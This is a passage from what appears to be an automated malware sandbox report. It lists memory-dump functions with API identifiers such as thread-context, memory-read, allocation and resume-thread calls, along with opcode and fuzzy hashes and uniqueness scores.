            • Opcode Fuzzy Hash: 367c6bdffe8aeb4f2b1429531e32a76fba011c9cc4d2059eaeac76ae7e5d4d93
            • Instruction Fuzzy Hash: 1341E93190CB5D8FDB18DF5898456F97BE0EF99310F04826FD049D3282DA746849CB96
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID: ContextThreadWow64
            • String ID:
            • API String ID: 983334009-0
            • Opcode ID: d5dd901f182cc4d5f516434e112e97229d7061b5d7543458ac774230aeb3c023
            • Instruction ID: e998e1ba86183824a7df43c45d980672e6fe248795b259331d2fec6f581710f8
            • Opcode Fuzzy Hash: d5dd901f182cc4d5f516434e112e97229d7061b5d7543458ac774230aeb3c023
            • Instruction Fuzzy Hash: 2841173180CB994FDB2ADF6898456E97FE1EF56321F04426FD089C31D3DB64640AC7A5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID: MemoryProcessRead
            • String ID:
            • API String ID: 1726664587-0
            • Opcode ID: 88cc8b6b1ca6146747178b2a666450a29ac601ce1c599e19f6383d2e437ae130
            • Instruction ID: 85458f96ac712c7c321dbbb3230751d747cae86a4945e999c51501652a610e33
            • Opcode Fuzzy Hash: 88cc8b6b1ca6146747178b2a666450a29ac601ce1c599e19f6383d2e437ae130
            • Instruction Fuzzy Hash: 6E41B431D0CB5C8FEB18DF58984A6FD7BE1EB99321F00426FE449D3282DA746846C795
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: f97d3cb5d682fcff5f779f357fd93c1e7e4c5deaa2b1dce1aa5039c90daf69fd
            • Instruction ID: 957760ba341c8659d0c2c3d0f6457e37e463568e91785022ea77608fe4c337ed
            • Opcode Fuzzy Hash: f97d3cb5d682fcff5f779f357fd93c1e7e4c5deaa2b1dce1aa5039c90daf69fd
            • Instruction Fuzzy Hash: FB31F63191CB5C8FEB1CAB68980A6F97BE0EB55320F04436ED04AC3292DA646817CBD5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: c16b9281f2dce3fb9a33d095cc09366681b08285ecf9263286a6fc45f281e9d9
            • Instruction ID: e0149c1ed68394b00f80ad1f343b55d7e8d159e9590621d8de9ce87f3c19b69a
            • Opcode Fuzzy Hash: c16b9281f2dce3fb9a33d095cc09366681b08285ecf9263286a6fc45f281e9d9
            • Instruction Fuzzy Hash: 8531C23190CA5C8FEB59DF68984A7E97BE0EF95320F04826BD04DD3192DA755406CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 160455bdb1fa4f6ce4bf2eb4d1de016e46d5ae52d2f7751a98c776db07197a8b
            • Instruction ID: d3351adcbe8b76d0a0b79bfd3a4c1927c6baee9a45a5bb1c4560c29f0212761a
            • Opcode Fuzzy Hash: 160455bdb1fa4f6ce4bf2eb4d1de016e46d5ae52d2f7751a98c776db07197a8b
            • Instruction Fuzzy Hash: 75B1956790D7E75BEB1AA62C9C9A0E53FA0DF5323471841B3C089CE1D3E919184FC67A
            Uniqueness

            Uniqueness Score: -1.00%